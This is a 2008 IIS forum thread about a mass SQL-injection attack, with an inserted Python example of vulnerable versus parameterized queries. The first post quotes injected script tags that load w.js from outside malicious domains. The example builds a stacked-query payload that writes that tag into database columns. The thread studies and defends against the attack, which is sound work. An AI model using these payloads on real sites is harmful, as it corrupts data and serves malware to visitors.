
Thread: SQL Injection attack issue

Last post 08-17-2008 10:17 PM by steve schofield. 4 replies.


  • 08-15-2008, 11:55 AM

    SQL Injection attack issue

    SQL injection has attacked so many sites these days. After analyzing the attack, I found a very strange case.

    The attacking URL included a script trying to add the following string to varchar columns in the database:

    ></title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script><!--

    It was captured in the log.

    But in the database, the data was changed to the following string, and only in those columns whose names include some special keywords like url, publish, image, etc.:

    ></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--

    A little different in the malicious site name. So I guess maybe there was something else hidden in this attack, but I can't figure it out.

    Another question: no file was changed on the server side. How was this injection added to some URL? Where is the source of the attack? On the fly? From a client computer?

    Any idea?

     

     

  • 08-15-2008, 12:27 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 10:00 AM
    • London, UK
    • Posts 758

    Re: SQL Injection attack issue

    It looks similar to this attack from a few months ago

    http://forums.iis.net/t/1148917.aspx

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 08-15-2008, 2:17 PM In reply to

    Re: SQL Injection attack issue

    Yes, but I want to know the reason for this specific case. The injection script said it adds string A to your data, but you get string B in your data instead. I don't understand. Maybe there is some potential danger included in the process of the attack.

  • 08-17-2008, 3:35 PM In reply to

    Re: SQL Injection attack issue

    Rule #1: always check the validity of the data before attempting to run it against a database.

    Rule #2: the command object catches these issues.

    Rule #3: cast everything to the type expected.
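    The three rules above are the fix for what the first post describes. The following is an added example, not code from this thread or from IIS: it uses Python's sqlite3 module standing in for SQL Server to show the concatenated query these attacks abuse beside the validated, parameterized version the rules call for (the `?` placeholder plays the role of a SqlParameter on the ADO.NET command object). The table, its rows and the `ATTACK_ID` value are constructed for the example; the script tag is the one logged in the first post.

```python
import sqlite3

# Constructed sample table (not from the original post). The victim was SQL
# Server; sqlite3 stands in so the example runs offline. Column names match
# the ones the thread says were hit (url, image).
SCHEMA = """
CREATE TABLE product (
    id    INTEGER PRIMARY KEY,
    name  VARCHAR(100),
    url   VARCHAR(255),
    image VARCHAR(255)
);
INSERT INTO product VALUES (1, 'Widget', 'http://shop.example/widget', 'widget.jpg');
INSERT INTO product VALUES (2, 'Gadget', 'http://shop.example/gadget', 'gadget.jpg');
"""

# The tag the first post found in its logs, verbatim.
SCRIPT_TAG = '></title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script><!--'

# Constructed query-string value that does what the thread describes: it ends
# the intended SELECT and appends an UPDATE against the text columns. (sqlite
# concatenates with ||; the SQL Server batches of 2008 used + and a cursor
# over the system catalog, and ended with -- to swallow the rest of the query.)
ATTACK_ID = (
    "1; UPDATE product SET url = url || '" + SCRIPT_TAG + "', "
    "image = image || '" + SCRIPT_TAG + "'"
)


def fresh_db():
    """New in-memory database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, product_id):
    """Query built by string concatenation, the pattern the attacks hit.

    product_id is taken from the request as-is. executescript() is used
    because, like ADO against SQL Server, it accepts a batch of several
    statements, which is exactly what the attacker relies on. The SELECT's
    rows are discarded; the UPDATE smuggled in behind it is the side effect.
    """
    sql = "SELECT name FROM product WHERE id = " + product_id
    conn.executescript(sql)


def lookup_hardened(conn, product_id):
    """Rules #1 and #3: validate and cast to the expected type first.
    Rule #2: bind the value as a parameter so the driver sends it as data,
    never as statement text."""
    pid = int(product_id)  # ValueError for anything that is not an integer
    row = conn.execute("SELECT name FROM product WHERE id = ?", (pid,)).fetchone()
    return row[0] if row else None


def lookup_param_only(conn, product_id):
    """Parameter binding alone, without the cast: the whole attack string is
    compared as one literal value and simply matches no row."""
    row = conn.execute("SELECT name FROM product WHERE id = ?", (product_id,)).fetchone()
    return row[0] if row else None


def tampered_rows(conn):
    """ids of rows whose url or image column now carries a script tag."""
    rows = conn.execute(
        "SELECT id FROM product WHERE url LIKE '%<script%' OR image LIKE '%<script%' ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = fresh_db()
    lookup_vulnerable(db, ATTACK_ID)
    print("vulnerable:", tampered_rows(db))  # [1, 2]: every row rewritten

    db = fresh_db()
    print("param only:", lookup_param_only(db, ATTACK_ID), tampered_rows(db))  # None []
    try:
        lookup_hardened(db, ATTACK_ID)
    except ValueError as err:
        print("hardened rejected input:", err)
    print("hardened:", lookup_hardened(db, "2"), tampered_rows(db))  # Gadget []
```

    The point of the second function is that the cast is what gives you a clean rejection you can log; binding alone already stops the statement from running, but it silently turns the attack into a lookup for a product that does not exist.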

     

  • 08-17-2008, 10:17 PM In reply to

    Re: SQL Injection attack issue

    UrlScan 3.0 can help in the short term to block SQL injections, but most likely legitimate requests would be impacted. Fixing / coding for it is the best option.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield

    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget